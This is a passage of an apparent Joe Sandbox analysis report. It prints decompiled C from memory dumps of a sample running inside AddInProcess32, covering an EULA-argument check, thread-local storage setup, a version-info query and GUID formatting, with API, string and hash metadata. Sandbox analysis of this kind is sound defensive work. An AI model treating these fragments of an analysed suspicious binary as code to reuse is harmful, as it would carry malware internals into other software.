                                              • Instruction Fuzzy Hash: 4E1106316143219BD720EB64D851BAB77A8EF44394F084A5DFD889E180EF70D645CBA3
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00401800(void* __ebx, intOrPtr* __edi, void* __esi) {
                                              				void* _t16;
                                              				void* _t18;
                                              				void* _t19;
                                              				intOrPtr* _t25;
                                              				signed int _t27;
                                              				char _t29;
                                              				void* _t30;
                                              
                                              				_t25 = __edi;
                                              				_t19 = __ebx;
                                              				_t29 = 0;
                                              				if(__edi != 0) {
                                              					_t27 = 0;
                                              					if( *__edi > 0) {
                                              						while(1) {
                                              							_t16 = E0040346A( *((intOrPtr*)(_t19 + _t27 * 4)),  *((intOrPtr*)(_t19 + _t27 * 4)), L"/accepteula");
                                              							_t30 = _t30 + 8;
                                              							if(_t16 == 0) {
                                              								break;
                                              							}
                                              							_t18 = E0040346A(_t16,  *((intOrPtr*)(_t19 + _t27 * 4)), L"-accepteula");
                                              							_t30 = _t30 + 8;
                                              							if(_t18 == 0) {
                                              								break;
                                              							} else {
                                              								_t27 = _t27 + 1;
                                              								if(_t27 <  *_t25) {
                                              									continue;
                                              								} else {
                                              								}
                                              							}
                                              							goto L10;
                                              						}
                                              						_t29 = 1;
                                              						while(_t27 <  *_t25 - 1) {
                                              							 *((intOrPtr*)(_t19 + _t27 * 4)) =  *((intOrPtr*)(_t19 + 4 + _t27 * 4));
                                              							_t27 = _t27 + 1;
                                              						}
                                              						 *_t25 =  *_t25 + 0xffffffff;
                                              					}
                                              					L10:
                                              				}
                                              				if(E00401470(_t29) != 0) {
                                              					_t29 = 1;
                                              				}
                                              				return 0 | _t29 != 0x00000000;
                                              			}

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __wcsicmp
                                              • String ID: -accepteula$/accepteula
                                              • API String ID: 1389419275-3604086781
                                              • Opcode ID: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                              • Instruction ID: ae80dfe79650e11862fde2afe1a2a16d5d6f03895628a9dbedd2dac65a09cae5
                                              • Opcode Fuzzy Hash: ba85f18d7fde8d1ccc12eb71a396890943377c3b439308736d5df5222ea4d1bc
                                              • Instruction Fuzzy Hash: F1012473D0022A87CB307EBA9C41B6B77486B50348F11863AAC59B73D2EA79DE50C695
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 70%
                                              			E004065E8(void* __ebx, void* __edx) {
                                              				void* __edi;
                                              				void* __esi;
                                              				long _t3;
                                              				void* _t9;
                                              				long _t12;
                                              				void* _t20;
                                              				long _t21;
                                              				long* _t22;
                                              
                                              				_t20 = __edx;
                                              				_t3 = GetLastError();
                                              				_push( *0x4138c0);
                                              				_t21 = _t3;
                                              				_t22 =  *((intOrPtr*)(E004064BA()))();
                                              				if(_t22 == 0) {
                                              					_t22 = E00407C87(1, 0x214);
                                              					if(_t22 != 0) {
                                              						_push(_t22);
                                              						_push( *0x4138c0);
                                              						_t9 =  *((intOrPtr*)(E00406443( *0x4144f8)))();
                                              						_t25 = _t9;
                                              						if(_t9 == 0) {
                                              							_push(_t22);
                                              							E00403199(_t20, _t22, __eflags);
                                              							_t22 = 0;
                                              							__eflags = 0;
                                              						} else {
                                              							_push(0);
                                              							_push(_t22);
                                              							E00406529(__ebx, _t21, _t22, _t25);
                                              							_t12 = GetCurrentThreadId();
                                              							_t22[1] = _t22[1] | 0xffffffff;
                                              							 *_t22 = _t12;
                                              						}
                                              					}
                                              				}
                                              				SetLastError(_t21);
                                              				return _t22;
                                              			}

                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00406665,?,004085BE,00000000,00000000,00000000), ref: 004065EA
                                                • Part of subcall function 004064BA: TlsGetValue.KERNEL32(?,004065FD), ref: 004064C1
                                                • Part of subcall function 004064BA: TlsSetValue.KERNEL32(00000000), ref: 004064E2
                                              • __calloc_crt.LIBCMT ref: 0040660C
                                                • Part of subcall function 00407C87: __calloc_impl.LIBCMT ref: 00407C95
                                                • Part of subcall function 00407C87: Sleep.KERNEL32(00000000,00406611,00000001,00000214), ref: 00407CAC
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(?,00406ED3,004035FD,?,?,00401E38,00000000,?,?), ref: 00406450
                                                • Part of subcall function 00406443: TlsGetValue.KERNEL32(FFFFFFFF,?,00401E38,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00406467
                                                • Part of subcall function 00406529: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00411A98,0000000C,0040663A,00000000,00000000), ref: 0040653A
                                                • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0040656E
                                                • Part of subcall function 00406529: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0040657E
                                                • Part of subcall function 00406529: InterlockedIncrement.KERNEL32(004132A8), ref: 004065A0
                                                • Part of subcall function 00406529: ___addlocaleref.LIBCMT ref: 004065C7
                                              • GetCurrentThreadId.KERNEL32 ref: 0040663C
                                              • SetLastError.KERNEL32(00000000), ref: 00406654
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl
                                              • String ID:
                                              • API String ID: 4195734883-0
                                              • Opcode ID: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                              • Instruction ID: 6acc180e9db3e0c08f8946cbde5c9b75496807f8aa197502050a49a5b2d53bc3
                                              • Opcode Fuzzy Hash: 0a1dba65162e7cf836f553f42e2d84d0de64361cde726b6ef0bf73927a476e36
                                              • Instruction Fuzzy Hash: 13F04C324002226BD2313BB5BC0668A3B95DF01BB9B12453FF542BA2D0DF3DC91182DD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 26%
                                              			E00401C30(signed int __ecx, void* __edx) {
                                              				void* __ebx;
                                              				void* __esi;
                                              				void* __ebp;
                                              				signed int _t20;
                                              				short _t21;
                                              				signed int _t30;
                                              				void* _t32;
                                              				void* _t48;
                                              				short* _t49;
                                              				void* _t51;
                                              
                                              				_t49 = _t51 - 0x204;
                                              				_push(0xfffffffe);
                                              				_push(0x411d48);
                                              				_push(E00404AF0);
                                              				_push( *[fs:0x0]);
                                              				_t20 =  *0x413004; // 0x98fc836b
                                              				 *(_t49 - 8) =  *(_t49 - 8) ^ _t20;
                                              				_t21 = _t20 ^ _t49;
                                              				_t49[0x100] = _t21;
                                              				_push(_t21);
                                              				 *[fs:0x0] = _t49 - 0x10;
                                              				 *((intOrPtr*)(_t49 - 0x18)) = _t51 - 0x1f0;
                                              				 *(_t49 - 0x1c) = 0;
                                              				_push(_t49[0x108]);
                                              				_push(_t49[0x106] & 0x0000ffff);
                                              				E004032BD(_t49, 0x100, L"\\StringFileInfo\\%04X%04X\\%s", __ecx & 0x0000ffff);
                                              				 *((intOrPtr*)(_t49 - 4)) = 0;
                                              				 *(_t49 - 0x1c) = VerQueryValueW(__edx, _t49, _t49 - 0x20, _t49 - 0x24);
                                              				 *((intOrPtr*)(_t49 - 4)) = 0xfffffffe;
                                              				asm("sbb eax, eax");
                                              				_t30 =  ~( *(_t49 - 0x1c)) &  *(_t49 - 0x20);
                                              				 *[fs:0x0] =  *((intOrPtr*)(_t49 - 0x10));
                                              				_pop(_t48);
                                              				_pop(_t32);
                                              				E0040318A(_t30, _t32, _t49[0x100] ^ _t49, _t48);
                                              				return _t30;
                                              			}

                                              APIs
                                              • _swprintf.LIBCMT ref: 00401C9C
                                                • Part of subcall function 004032BD: __vswprintf_s_l.LIBCMT ref: 004032D0
                                              • VerQueryValueW.VERSION(00000000,?,?,?,?,?,98FC836B,?,00000000,00000000,?,?,00404AF0,00411D48,000000FE), ref: 00401CB4
                                              Strings
                                              • \StringFileInfo\%04X%04X\%s, xrefs: 00401C8E
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: QueryValue__vswprintf_s_l_swprintf
                                              • String ID: \StringFileInfo\%04X%04X\%s
                                              • API String ID: 4007372565-3176804452
                                              • Opcode ID: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                              • Instruction ID: 16fea18b266e5000ac73c5f0c1a7a8be829457a3a8ce474c65f6ca9c4e30ee4f
                                              • Opcode Fuzzy Hash: 2665c408c1388923a7c9a331660d97ad6d30d5893696d7202d0593747b124ff4
                                              • Instruction Fuzzy Hash: 242169B2940248ABDB20DF95DC45FEE77F8FB48710F10465EF515A7181D6785604CB64
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E02B528DA(short* __ecx, void* __esi) {
                                              				signed int _v8;
                                              				short _v524;
                                              				signed char _v525;
                                              				signed char _v526;
                                              				signed char _v527;
                                              				signed char _v528;
                                              				signed char _v529;
                                              				signed char _v530;
                                              				signed char _v531;
                                              				signed char _v532;
                                              				signed short _v534;
                                              				signed short _v536;
                                              				char _v540;
                                              				signed int _t19;
                                              				short* _t50;
                                              				signed int _t51;
                                              
                                              				_t19 =  *0x2b56004; // 0xbb40e64e
                                              				_v8 = _t19 ^ _t51;
                                              				_t50 = __ecx;
                                              				if(__ecx != 0) {
                                              					 *__ecx = 0;
                                              					E02B52CE7(0,  &_v540, 0x10);
                                              					__imp__CoCreateGuid( &_v540);
                                              					E02B52CE7( &_v540,  &_v524, 0x200);
                                              					wsprintfW( &_v524, L"{%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}", _v540, _v536 & 0x0000ffff, _v534 & 0x0000ffff, _v532 & 0x000000ff, _v531 & 0x000000ff, _v530 & 0x000000ff, _v529 & 0x000000ff, _v528 & 0x000000ff, _v527 & 0x000000ff, _v526 & 0x000000ff, _v525 & 0x000000ff);
                                              					E02B52C9C(_t50,  &_v524);
                                              				}
                                              				return E02B53C33(_v8 ^ _t51);
                                              			}

                                              APIs
                                              Strings
                                              • {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}, xrefs: 02B52984
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmp
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: CreateGuidwsprintf
                                              • String ID: {%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X}
                                              • API String ID: 543765187-891345449
                                              • Opcode ID: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
                                              • Instruction ID: 1a011aac4c8572908b03cb8673d54d70a0add09e4ee5b6f11c03a671819c2d26
                                              • Opcode Fuzzy Hash: 1eb3797bb68ba2e66233865266c68aaeb14d14c1f0570a424897be2b9d3c0347
                                              • Instruction Fuzzy Hash: FA117571D443BC6ECB719BA48C18BFAB7BC9F1D201F0405D5B9A9D6142DA388BC49F60
                                              Uniqueness

                                              Uniqueness Score: -1.00%